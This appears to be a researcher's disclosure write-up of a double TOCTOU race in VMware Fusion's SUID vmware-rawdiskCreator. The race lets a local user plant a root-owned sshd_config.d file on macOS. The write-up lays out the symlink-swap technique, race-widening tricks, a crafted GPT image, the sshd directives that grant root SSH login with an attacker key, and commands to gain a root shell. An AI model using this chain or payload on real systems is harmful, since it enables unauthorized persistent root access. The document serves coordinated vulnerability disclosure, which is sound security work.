C111000: Race Against The Virtual Machine or how a SUID binary in VMware Fusion was raced to gain root privileges on macOS
Introduction
VMware Fusion is one of the most widely deployed virtualization solutions on
macOS. It allows users to run virtual machines, manage virtual disk images, and
interact with raw physical disks. One of its lesser-known components is a
command line utility called vmware-rawdiskCreator, which creates VMDK
(Virtual Machine Disk) descriptors from physical disk devices. What makes this
binary particularly interesting from a security perspective is that it is
installed as SUID (or setuid) root.
During this research, I identified a double TOCTOU (time-of-check to time-of-use) race condition. By exploiting two sequential race windows, an unprivileged user can redirect the binary’s root-privileged file creation operations to arbitrary directories on the filesystem.
Combined with a carefully crafted GPT disk image and a creative choice of
target directory, this vulnerability achieves persistent Local Privilege
Escalation as root.
Research environment (vulnerable version <= 25H2u1)
Tests were performed on macOS 26.4.1 (25E253). Take this information into consideration if you ever want to reproduce these findings on other macOS versions or VMware Fusion releases.
Quick download and installation
You can download VMware Fusion from the VMware website (which redirects to the Broadcom website).
After mounting the downloaded .dmg image, all you have to do is click the VMware icon to start the installation.
Then you can launch the tool.
Target identification
During installation, VMware Fusion places several binaries inside its application bundle. Let’s have a look at the ones installed with the setuid bit.
vmware-rawdiskCreator has the setuid bit enabled. The binary is owned by
root and, because the s bit is set, it starts running with root privileges
regardless of which user launches it.
The target could easily have been identified using a tool I developed called MTM, which performs local attack surface mapping for macOS. It recursively walks the filesystem, identifies Mach-O binaries, and captures file metadata and code-signing entitlements.
The binary is a universal (Fat/fat) Mach-O supporting both Intel and Apple Silicon. Let’s look at its usage.
The create command takes a raw disk device (e.g., /dev/diskXX), a partition
number, an output path, and an adapter type. It produces two output files:
- <USER_DEFINED>-pt.vmdk, the partition table extent (raw MBR + GPT data from the disk).
- <USER_DEFINED>.vmdk, the VMDK descriptor (a text file).
These files are created inside a temporary working directory hierarchy that the
binary builds under TMPDIR (if the environment variable is set).
Analysis
The goal of dynamic analysis is to run the binary as expected and observe what
happens from a filesystem perspective. For this purpose, we can use fs_usage.
I’m using a custom patched version of
fs_usage_ng, which is itself a patched version of fs_usage from Gergely Kalman.
Since we can now see which functions and syscalls the binary calls, we can begin the first stage of reverse engineering: identifying how the paths are constructed and determining whether the user running the binary can control them.
We must therefore reverse the function sub_10001c9e0().
Since it is quite a long function, I will just summarize what it does rather than show you some screenshots.
sub_10001c9e0() starts by taking a process-wide exclusive lock, then calls
_geteuid() and uses that as the security identity for the temp directory. It
keeps two cached paths, selected by the second argument. If a cached path
already exists for the current effective UID, it tries mkdir(path, 0700). If
that fails with EEXIST, it runs lstat() and only accepts the directory if
all of the following conditions are true:
- It is a directory where st_uid == geteuid().
- Its permissions are restricted to 0700.
Here st.st_uid is the user ID of the owner returned by lstat().
If there is no usable cached directory, it searches for a base temp directory.
The first argument controls whether it first consults the preference key
tmpDirectory (_Preference_GetString()). After that it tries _getenv("TMPDIR"),
then hardcoded candidates (including /var/tmp/
and /tmp), then the current working directory
via _File_Cwd(), and then one more built-in fallback.
Every candidate is only screened with
_FileIsWritableDir().
Playing with getenv()
As shown, we can control the path of the temporary directory by manipulating
the TMPDIR environment variable. Let’s see what happens with fs_usage when
this variable is under our control.
Binary’s behavior
When invoked using create, the binary performs the following operations
(while running with effective UID 0, root privileges):
1. mkdir TMPDIR/vmware-root/ (mode 0700).
2. mkdir TMPDIR/vmware-root/rawdiskCreator<pid>/ (mode 0700).
3. open TMPDIR/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>-pt.vmdk (O_CREAT).
4. write raw MBR + GPT data from the source disk.
5. open TMPDIR/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>.vmdk (O_CREAT).
6. write VMDK descriptor text.
- On error or completion, it calls unlink on files and rmdir on directories.
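To make the path layout concrete, here is a small sketch that assembles the location of the partition table file from its parts. The function name build_pt_path and its parameters are hypothetical; only the directory and file naming scheme comes from the observations above.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Builds "<tmpdir>/vmware-root/rawdiskCreator<pid>/<name>-pt.vmdk".
 * Returns 0 on success, -1 if the result does not fit in `cap` bytes. */
int build_pt_path(char *out, size_t cap, const char *tmpdir,
                  pid_t pid, const char *name) {
    assert(out != NULL && tmpdir != NULL && name != NULL);
    int n = snprintf(out, cap, "%s/vmware-root/rawdiskCreator%ld/%s-pt.vmdk",
                     tmpdir, (long)pid, name);
    return (n >= 0 && (size_t)n < cap) ? 0 : -1;
}
```

Every component after the TMPDIR prefix is predictable once the PID is known, so whoever controls the prefix controls where the whole hierarchy lives.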
When looking at the execution flow, I realized that several properties of this behavior were relevant to perform a TOCTOU attack.
TMPDIR environment variable is user-controlled
The binary inherits TMPDIR from the calling process and uses it as the base
for its temporary directory hierarchy. On macOS, TMPDIR typically points to
a per user directory under /private/var/folders/,
but an attacker can set it to any path before invoking the binary.
Missing O_NOFOLLOW on source files
While the binary does use O_NOFOLLOW when creating destination files (after
dropping privileges for the final VMDK output), it does not use this flag for
the intermediate source files created in above steps 3 and 5. This means that
if any component of the path is a symlink, the kernel will happily follow it.
The O_NOFOLLOW flag causes the open to fail if the last component of the path is a symbolic link. Its absence here is the root cause of the vulnerability.
Files are created as root
Because the binary’s effective UID is 0 at the time of file creation, the
resulting files are owned by root with mode 0600. This is a powerful
primitive as we can create root owned files in any directory where root has
write access (with the exception of directories protected by SIP).
Cleanup on exit
The binary removes its temporary files and directories before exiting. This
means that after a successful race, we must freeze the binary (via SIGSTOP)
before it can run its cleanup routine, or the planted files will be deleted.
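A minimal sketch of the freeze step, assuming the target was started as a child of the controlling process. The helper names are hypothetical, and an idle child stands in for the real binary.

```c
#include <assert.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Forks a child that idles forever; it stands in for the target process. */
pid_t spawn_idle_child(void) {
    pid_t pid = fork();
    if (pid == 0) {
        for (;;) {
            pause();
        }
    }
    return pid;
}

/* Sends SIGSTOP and waits until the kernel reports the child as stopped.
 * Returns 0 once the child is frozen, -1 on error. */
int freeze_child(pid_t pid) {
    int status = 0;
    if (kill(pid, SIGSTOP) != 0) {
        return -1;
    }
    if (waitpid(pid, &status, WUNTRACED) != pid) {
        return -1;
    }
    return WIFSTOPPED(status) ? 0 : -1;
}

/* Kills the (possibly frozen) child and reaps it. */
void discard_child(pid_t pid) {
    kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);
}
```

SIGSTOP cannot be caught or ignored, so a frozen process never reaches its cleanup code until it receives SIGCONT.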
Understanding the TOCTOU vulnerability
The vulnerability is a classic TOCTOU race condition. The binary performs
directory creation and file creation as separate, non-atomic operations.
Between these operations, an attacker can substitute a directory with a
symlink, causing the binary’s subsequent open() calls to follow the symlink
to a location of the attacker’s choosing.
The attack consists of two sequential TOCTOU swaps:
After both swaps succeed, the path that the binary resolves becomes:
The binary creates <USER_DEFINED>-pt.vmdk as
root in what it believes is its private temp directory, but the file actually
lands in /etc/ssh/sshd_config.d/.
Enlarging your race window
TOCTOU races are known for being extremely time sensitive. The interval between the creation of the directory and the creation of the file can be as short as a few microseconds. To ensure I win the race reliably, I used two techniques.
Path-padding symlink chains
Instead of pointing TMPDIR directly at a temporary directory, we create a
chain of 20 symlinks, each stuffed with ./ and
d/../ path components.
tmpdir/s1 -> ././d/../././d/../...s2
tmpdir/s2 -> ././d/../././d/../...s3
...
tmpdir/s20 -> ././d/../././d/../... (resolves to tmpdir itself)
tmpdir/d -> (real directory, needed for "d/../" to resolve)
In XNU, the main pathname resolution function is
namei(struct nameidata *ndp). namei() converts a pathname into the resolved vnode/inode, and its comment shows the lookup flow: choose the starting directory, then repeatedly call lookup on path components. At a lower level, the resolver is lookup(), which is called from inside namei().
We then set TMPDIR to <tmpdir>/s1. When the
binary resolves this path, the function namei() must traverse thousands of
path components across 20 symlink hops. This wastes tens of microseconds of
CPU time in kernel space, dramatically widening the race window.
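The padded link targets can be generated with a helper along these lines. This is a sketch under assumptions: the name build_padded_target and the idea of a fixed repeat count are mine, and the actual exploit may build its strings differently.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Writes `repeats` copies of "././d/../" followed by `next` into `out`.
 * Returns the resulting string length, or -1 if it does not fit in `cap`. */
int build_padded_target(char *out, size_t cap, int repeats, const char *next) {
    static const char unit[] = "././d/../";
    const size_t unit_len = sizeof unit - 1;

    assert(out != NULL && next != NULL && repeats >= 0);
    size_t need = unit_len * (size_t)repeats + strlen(next) + 1;
    if (need > cap) {
        return -1;
    }
    char *p = out;
    for (int i = 0; i < repeats; i++) {
        memcpy(p, unit, unit_len);   /* each unit resolves back to "." */
        p += unit_len;
    }
    strcpy(p, next);                 /* name of the next link in the chain */
    return (int)(need - 1);
}
```

The resulting string would be passed as the first argument to symlink(2). Each target has to stay within the system path length limit, which bounds how many padding units a single link can carry.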
This technique is inspired by the path padding approach described by Borisov, Johnson, and Dean in “Fixing Races for Fun and Profit: How to Abuse atime” (USENIX Security 2005). The idea is that forcing the kernel to perform long path resolution slows down the victim process without requiring any special privileges.
The resulting layout closely resembles the diagram in the USENIX Security 2005 paper.
The total number of symlink hops must stay within macOS’s MAXSYMLINKS (from
XNU kernel source bsd/sys/param.h) limit.
Our directory structure is as follows:
- 20 (chain) + 1 (vmware-root) + 1 (rawdiskCreator<pid>) = 22 hops
This fits within the 32-hop limit.
CPU pressure
In addition to path padding, we spawn background threads that perform cache thrashing memory writes. These threads compete with the vulnerable binary for CPU time, causing it to be preempted more frequently and further stretching the duration of the race window.
One pressure thread is spawned per logical CPU. The combination of path padding
and CPU pressure makes the race extremely reliable. During my tests, it
consistently won within 1 to 2 (while loop) attempts on my host and 25 to 28
(while loop) attempts within a VM.
Stage 1: RENAME_SWAP on vmware-root
The first race targets the vmware-root directory.
After the binary creates TMPDIR/vmware-root/
as a real directory, we need to replace it with a symlink to our staging
directory.
We monitor the temp directory using fstatat(), waiting for
vmware-root to appear.
The key operation here is renameatx_np() with the RENAME_SWAP flag. This is
a macOS specific system call that atomically swaps two directory entries. We
precreate a symlink called .swap_sym pointing
to our staging directory, then swap it with vmware-root
in a single atomic operation.
renameatx_np(2) with RENAME_SWAP performs an atomic exchange of two filesystem entries. This is strictly better than a non-atomic rename + symlink sequence, because it eliminates the brief window where neither entry exists. However, both entries must be on the same filesystem.
If RENAME_SWAP fails (for example, if the temp directory and the swap target
are on different filesystems), we fall back to a non-atomic rename + symlink
sequence.
After the swap succeeds, the binary’s vmware-root entry now points to our staging directory. Any subsequent path resolution through vmware-root lands under our control.
Stage 2: rmdir + symlink on rawdiskCreator<pid>/
After Stage 1, the binary creates rawdiskCreator<pid>/ inside what is now our staging directory. We need to replace this directory with a symlink to the final target /etc/ssh/sshd_config.d/.
The process is similar to Stage 1, but we use rmdir() + symlink() instead
of RENAME_SWAP, because the directory to be replaced is freshly created and
empty.
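The Stage 2 substitution boils down to two calls. The sketch below uses hypothetical names and a scratch directory under /tmp. The demo function only checks that the entry ends up as a symlink and does not race anything.

```c
#include <assert.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Replaces the empty directory at `path` with a symlink to `target`.
 * Returns 0 on success, or the errno of the step that failed. */
int replace_dir_with_symlink(const char *path, const char *target) {
    assert(path != NULL && target != NULL);
    if (rmdir(path) != 0) {
        return errno;            /* e.g. ENOTEMPTY if a file already landed */
    }
    if (symlink(target, path) != 0) {
        return errno;
    }
    return 0;
}

/* Self-check: create an empty directory, swap it, confirm it is a symlink.
 * Returns 0 if the swap worked, -1 otherwise. */
int stage2_demo(void) {
    char base[] = "/tmp/stage2-demo-XXXXXX";
    char victim[128];
    struct stat st;

    if (mkdtemp(base) == NULL) {
        return -1;
    }
    snprintf(victim, sizeof victim, "%s/rawdiskCreator1234", base);
    if (mkdir(victim, 0700) != 0) {
        rmdir(base);
        return -1;
    }
    int rc = replace_dir_with_symlink(victim, "/tmp");
    int ok = (rc == 0) && lstat(victim, &st) == 0 && S_ISLNK(st.st_mode);

    unlink(victim);              /* removes the symlink if the swap worked */
    rmdir(victim);               /* removes the directory if it did not */
    rmdir(base);
    return ok ? 0 : -1;
}
```

Unlike an atomic swap, there is a short interval between rmdir() and symlink() where the name does not exist at all.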
Before resuming the binary, we set up a kqueue watch on the target directory
using EVFILT_VNODE with NOTE_WRITE. This mechanism allows us to be notified
the instant a new file appears in the target directory.
kqueue(2) is the macOS kernel event notification interface. EVFILT_VNODE with NOTE_WRITE fires when the contents of a directory change (e.g., a file is created or deleted). This is significantly faster than polling with readdir(), allowing us to freeze the binary almost immediately after it creates the first file.
When the binary resumes and creates <USER_DEFINED>-pt.vmdk, the full path resolution proceeds as follows:
The kqueue fires, and we immediately SIGSTOP the binary again. This is
critical as the binary creates <USER_DEFINED>-pt.vmdk
first, then <USER_DEFINED>.vmdk. By freezing
it after the first file is created, but before the second, we ensure that only
<USER_DEFINED>-pt.vmdk lands in the target
directory.
Crafting the payload
The planted file <USER_DEFINED>-pt.vmdk contains the raw MBR (Master Boot Record) and GPT (GUID Partition Table) data from the source disk. Since we craft the source disk image ourselves, we have full control over its contents.
MBR boot code
According to the UEFI specification, the first 440 bytes of the MBR are reserved for boot code. On GPT disks, this area is unused, which gives us 440 bytes of fully controlled payload at the very beginning of the -pt.vmdk file.
On a GPT disk, the BootCode field in the first sector is not used because UEFI firmware does not execute sector 0. Instead of running raw disk code like BIOS does with MBR, UEFI reads the GPT directly and loads a bootloader from the EFI System Partition.
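As an illustration, a protective MBR sector carrying a payload in its boot code area could be assembled like this. The function name, the zero padding after the payload, and the use of 0xFFFFFF for the ending CHS are simplifying assumptions of this sketch. The field offsets follow the UEFI protective MBR layout.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define SECTOR_SIZE    512
#define BOOT_CODE_SIZE 440

/* Stores a 32-bit value in little-endian byte order. */
static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

/* Fills one 512-byte sector with a protective MBR whose boot code area
 * starts with `payload`. Returns 0 on success, -1 if the payload is
 * longer than the 440-byte boot code area. */
int build_protective_mbr(uint8_t sector[SECTOR_SIZE], const char *payload,
                         uint32_t total_sectors) {
    assert(sector != NULL && payload != NULL && total_sectors > 1);
    size_t len = strlen(payload);
    if (len > BOOT_CODE_SIZE) {
        return -1;
    }
    memset(sector, 0, SECTOR_SIZE);          /* assumption: pad with zeros */
    memcpy(sector, payload, len);            /* bytes 0..439: boot code */

    uint8_t *entry = sector + 446;           /* first partition record */
    entry[0] = 0x00;                         /* boot indicator */
    entry[1] = 0x00; entry[2] = 0x02; entry[3] = 0x00;  /* starting CHS */
    entry[4] = 0xEE;                         /* OS type: GPT protective */
    entry[5] = 0xFF; entry[6] = 0xFF; entry[7] = 0xFF;  /* ending CHS */
    put_le32(entry + 8, 1);                  /* starting LBA (GPT header) */
    put_le32(entry + 12, total_sectors - 1); /* size in sectors */

    sector[510] = 0x55;                      /* MBR signature */
    sector[511] = 0xAA;
    return 0;
}
```

For a 10 MB image with 512-byte sectors, total_sectors would be 20480.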
Building a valid GPT image
We cannot simply dump arbitrary data into a file and pass it to the binary. The
vmware-rawdiskCreator binary validates that the source disk contains a valid
GPT partition table with at least one partition. We must construct a compliant
GPT image.
Our image builder creates a minimal 10 MB disk image with:
- A protective MBR with our payload in the boot code area.
- A primary GPT header (sector 1) with valid checksums.
- A partition entry array (sectors 2-33) containing one Apple HFS+ partition.
- A backup GPT header and entry array at the end of the image.
The partition type GUID is set to Apple HFS/HFS+, which the binary accepts for
partition mode operation. The image is then attached as a virtual disk device
using hdiutil.
Command:
hdiutil attach -nomount payload.img
Output:
/dev/diskXX GUID_partition_scheme
/dev/diskXXs1 Apple_HFS
This /dev/diskXX device is passed to
vmware-rawdiskCreator as the source disk.
Eliminating newline (0x0A) bytes from GPT structures
For reasons that will become clear in the next section, the planted
-pt.vmdk file must be parseable as a valid
sshd configuration file. The configuration format we target uses # to
denote comments. Our strategy is as follows:
- The payload (first 440 bytes) contains valid configuration directives and ends with \n#.
- The # at the end of the payload makes everything that follows a comment.
- If there are no more 0x0A (newline) bytes in the remaining ~34KB of GPT data, the entire binary content forms a single, very long comment line.
Most GPT fields are naturally free of 0x0A.
The problematic fields are the CRC32 checksums. These are computed over other fields and cannot be directly set to arbitrary values. However, we can influence them indirectly by modifying fields that contribute to the checksum but have no semantic significance to the binary (we can brute-force two GUID fields).
Partition unique GUID (16 bytes)
This is a random identifier for the partition. We iterate through candidate
values, computing the CRC32 of the full 128 entry partition array for each,
until we find one where the resulting CRC contains no 0x0A byte. Each
candidate byte is deterministically derived and clamped away from 0x0A.
Disk GUID (16 bytes)
This identifies the disk itself. We iterate similarly, but this time we must
satisfy two constraints simultaneously. The primary header CRC and the backup
header CRC must both be free of 0x0A. The two headers have different LBA
values (the backup header’s myLBA and alternateLBA are swapped), so their
CRCs differ.
In practice, both searches converge in 1 to 3 attempts. After bruteforcing, a
final scan verifies that zero 0x0A bytes remain anywhere in the GPT
structures.
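The search itself is simple enough to sketch. The code below uses the standard reflected CRC-32 that GPT relies on. The function names and the formula used to derive candidate bytes are hypothetical stand-ins for whatever the real image builder does.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Bitwise CRC-32 (reflected polynomial 0xEDB88320), as used by GPT. */
uint32_t crc32_ieee(const uint8_t *data, size_t len) {
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int b = 0; b < 8; b++) {
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
        }
    }
    return ~crc;
}

/* Returns 1 if any of the four bytes of `v` equals 0x0A. */
int has_newline_byte(uint32_t v) {
    for (int i = 0; i < 4; i++) {
        if (((v >> (8 * i)) & 0xFFu) == 0x0Au) {
            return 1;
        }
    }
    return 0;
}

/* Rewrites the 16 GUID bytes at buf[guid_off] with deterministic candidates
 * (clamped away from 0x0A) until the CRC-32 of the whole buffer contains no
 * newline byte. Returns the number of candidates tried, or -1 on failure. */
int find_newline_free_guid(uint8_t *buf, size_t len, size_t guid_off,
                           int max_tries) {
    assert(buf != NULL && guid_off + 16 <= len);
    for (int t = 0; t < max_tries; t++) {
        for (int i = 0; i < 16; i++) {
            uint8_t b = (uint8_t)(0x41 + 31 * t + 7 * i);
            buf[guid_off + i] = (b == 0x0A) ? 0x0B : b;
        }
        if (!has_newline_byte(crc32_ieee(buf, len))) {
            return t + 1;
        }
    }
    return -1;
}
```

A uniformly distributed 32-bit CRC contains at least one 0x0A byte with probability 1 - (255/256)^4, roughly 1.6%, which is why the search tends to stop after very few candidates.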
Finding the right target or why sudoers.d fails and sshd_config.d works
The exploit gives us the ability to create a root owned file in any
directory (excluding those protected by SIP). The planted file is always named
<USER_DEFINED>-pt.vmdk (derived from the
output basename and the -pt.vmdk suffix
hardcoded in the binary). The key question is, “Where should we plant this file
to achieve privilege escalation?”.
sudoers.d dead end
The obvious first target is /etc/sudoers.d/. On macOS, /etc/sudoers includes this directive:
File: /etc/sudoers
...
## Read drop-in files from /private/etc/sudoers.d
## (the '#' here does not indicate a comment)
#includedir /private/etc/sudoers.d
Despite the # prefix, this is not a comment. The #includedir directive
tells sudo to read all configuration files from the specified directory. If we
could plant a file containing %staff ALL=(ALL) NOPASSWD: ALL in
/etc/sudoers.d/, any member of the staff group
(which includes all local users on macOS) would gain passwordless sudo access.
However, sudo applies a filename filter to files read via #includedir.
From the sudoers(5) manual page: when sudo reads the sudoers
file via #includedir, it will skip any files that end in ~ or contain a . character.
Our file suffix is -pt.vmdk. It contains a .,
so sudo will unconditionally skip it.
Since the filename is derived from the binary’s internal logic (it appends .vmdk and -pt.vmdk to the output path argument), there is no way to avoid the dots.
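The documented rule can be restated as a tiny predicate. This is a paraphrase of the manual page wording, not code taken from sudo, and the function name is hypothetical.

```c
#include <assert.h>
#include <string.h>

/* Returns 1 if a file name would be skipped under the documented rule:
 * names that end in '~' or contain a '.' are ignored. */
int includedir_would_skip(const char *name) {
    assert(name != NULL);
    size_t len = strlen(name);
    if (len > 0 && name[len - 1] == '~') {
        return 1;
    }
    return strchr(name, '.') != NULL;
}
```

Any name produced by the binary ends in .vmdk, so the predicate returns 1 regardless of the basename chosen by the attacker.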
I explored several workarounds:
- LaunchDaemons: /Library/LaunchDaemons/ requires .plist extension. launchctl load returns “Input/output error” for .vmdk files.
- Periodic scripts: periodic(8) checks executability. Our file has mode 0600 (no execute bit), and we cannot chmod it.
- PAM: /etc/pam.d/ requires files named after the service (e.g., sudo, login). A file named -pt.vmdk does not match any service.
- cron.d: Does not exist by default on macOS.
- paths.d: path_helper runs as the calling user, which cannot read our 0600 file. And even when readable, paths.d entries are appended (not prepended) to PATH, preventing command shadowing.
The sshd_config.d breakthrough
After exhausting the obvious targets, I examined how macOS configures OpenSSH. The file /etc/ssh/sshd_config contains:
Include /etc/ssh/sshd_config.d/*
This is a critical difference from sudo’s #includedir. OpenSSH’s Include
directive uses standard glob(3) pattern matching. The pattern * matches all
non hidden files regardless of their extension or the presence of dots in their
filename. Our -pt.vmdk file matches this glob
and will be included.
The distinction is subtle but critical. sudo’s #includedir applies a custom filename filter (rejecting files with .), while OpenSSH’s Include uses the system’s glob(3) function, which has no such filter. This difference is what makes sshd_config.d a viable target when sudoers.d is not.
Furthermore, the Include directive appears at the top of
sshd_config, before all other options. Since
OpenSSH uses first match wins semantics, our directives take precedence.
sshd_config uses # for comments, just like
sudoers. Our \n# trick works identically.
sshd runs as root and can read the 0600 file.
I verified that the existing file in the include directory (100-macos.conf) does not conflict with our payload:
None of these options overlap with our payload, as our payload consists of:
PermitRootLogin yes
AuthorizedKeysCommand /bin/cat /tmp/.k
AuthorizedKeysCommandUser root
#
When the binary writes this into the MBR boot code area and the rest of the GPT data follows, the resulting <USER_DEFINED>-pt.vmdk file looks like:
Line 1: PermitRootLogin yes (valid sshd_config directive)
Line 2: AuthorizedKeysCommand /bin/cat /tmp/.k (valid sshd_config directive)
Line 3: AuthorizedKeysCommandUser root (valid sshd_config directive)
Line 4: #<34 KB of binary GPT data> (comment with no newlines to EOF)
Each directive serves a specific purpose:
- PermitRootLogin yes, allows SSH login as the root user.
- AuthorizedKeysCommand /bin/cat /tmp/.k, tells sshd to execute /bin/cat /tmp/.k to obtain authorized public keys for any connecting user. The /bin/cat binary satisfies sshd’s requirement as the command is owned by root and not writable by group or others. This approach is additive. It does not override AuthorizedKeysFile, so existing SSH authentication for other users remains unaffected.
- AuthorizedKeysCommandUser root, specifies that the command should run as root.
The file /tmp/.k needs to be created before
running the exploit, as it will contain our Ed25519 public key. But first, I
verified that sshd accepts this configuration by running sshd in test mode.
Command:
/usr/sbin/sshd -T -f /tmp/test_main.conf -h /tmp/test_hostkey | grep -E 'permit|authorized'
Output:
permitrootlogin yes
authorizedkeyscommand /bin/cat /tmp/.k
authorizedkeyscommanduser root
All three directives are active, and sshd exits with code 0, confirming that
the binary GPT data after # is correctly treated as a comment.
Exploitation and proof of concept
Prerequisites
The exploit requires SSH (Remote Login) enabled on the target system (or patience for it to be enabled).
Creation of cryptographic keys
Before running, we prepare the SSH keys that will be used for root
authentication:
ssh-keygen -t ed25519 -f /tmp/.kp -N ""
cp /tmp/.kp.pub /tmp/.k
Compiling the exploit
cc -O2 -lpthread -o exploit exploit.c
Running the exploit
File: exploit.c (sha256: 7e56de8b1fb461f4e67559a8d89b7368246156fe0448717da4514aa2183718a9)
/*
* /\ .-----. /\
* //\\/ \//\\
* |/\| 0 |/\|
* //\\\;-----;///\\
* // \/ . \/ \\
* (| ,-_|coiffeur|_-, |)
* //`__\.-.-./__`\\
* // /.-( )-.\ \\
* (\ |) ' ' (| /)
* ` (| |) `
* \) (/
* Title: VMware Fusion TOCTOU LPE as root (macOS)
* Author: Mathieu Farrell aka @Coiffeur0x90
* Summary: Exploits a double TOCTOU race condition in the suid root binary
* vmware-rawdiskCreator to write an attacker controlled, root owned
* file into /etc/ssh/sshd_config.d/. The planted file configures
* sshd to accept root SSH login using a attacker supplied public key,
* achieving persistent local privilege escalation.
...
Gaining root access
Once sshd is running (if Remote Login is enabled, or after the next reboot on
systems where it is enabled), the attacker can SSH in as root:
ssh -i /tmp/.kp root@localhost
The planted configuration causes sshd to run /bin/cat /tmp/.k as the
AuthorizedKeysCommand, which returns the attacker’s public key. SSH public
key authentication succeeds, and the attacker obtains a root shell.
Persistence
The planted file survives reboots. It will be included by sshd on every
startup via the Include /etc/ssh/sshd_config.d/* directive. The attacker
maintains root SSH access as long as the file remains in
/etc/ssh/sshd_config.d/ and the key file exists
at /tmp/.k.
The <USER_DEFINED>.vmdk problem
It is worth mentioning a subtlety in the exploit’s race against the binary’s file creation sequence. The binary creates two files:
- <USER_DEFINED>-pt.vmdk, the partition table (our payload).
- <USER_DEFINED>.vmdk, the VMDK descriptor (a text file with VMware-specific syntax).
If <USER_DEFINED>.vmdk is also created in
/etc/ssh/sshd_config.d/, it will be included by
sshd’s glob and parsed. This file begins with # Disk DescriptorFile (a comment),
but subsequent lines like version=1 are not valid
sshd_config keywords. sshd might treat
unknown keywords as fatal errors and refuse to start.
This is why the kqueue-based freeze mechanism in Stage 2 is critical. By
detecting the first file creation (the NOTE_WRITE event on the target
directory) and immediately sending SIGSTOP, we freeze the binary after
<USER_DEFINED>-pt.vmdk is created but before
<USER_DEFINED>.vmdk is written. In all of my
test runs, only <USER_DEFINED>-pt.vmdk landed in the target directory.
Conclusion
This research demonstrates how a TOCTOU race condition in a setuid binary can
be escalated to full root access on macOS. The key ingredients of this recipe
were:
- A SUID root binary that follows symlinks when creating files in a user-controlled directory hierarchy.
- Path-padding symlink chains to widen the race window to a reliably winnable size.
- An atomic directory swap (RENAME_SWAP) for the first race, and a kqueue-triggered freeze for precise timing control.
- A crafted GPT disk image with all 0x0A bytes brute forced out of the CRC32 checksums, making the binary partition table data invisible to line oriented config parsers.
- The subtle difference between sudo’s #includedir (which filters filenames containing .) and OpenSSH’s Include (which uses unrestricted glob(3) matching), making sshd_config.d a viable target.
Thanks for taking the time to read this article.
Timeline
- 2026 March 31: Discovered the vulnerability in my hotel room after the second day of attending Csaba Fitzl & Gergely Kalman’s training session at Zer0con.
- 2026 April 12: First email sent to security@vmware.com.
- 2026 April 12: Second email sent to vmware.psirt@broadcom.com.
- 2026 April 12: Start of the investigation by VMware team.
- 2026 April 25: Vulnerability confirmed by VMware team.
- 2026 April 25: I declined to join the private Bug Bounty program and therefore declined to sign the associated NDA.
- 2026 April 29: VMware informed me that the process now qualifies as a public disclosure and that they would keep me updated on the rest of the process.
- 2026 May 11: VMware informed me that the advisory would be published.
- 2026 May 14: The advisory has been published as VMSA-2026-0003/CVE-2026-41702.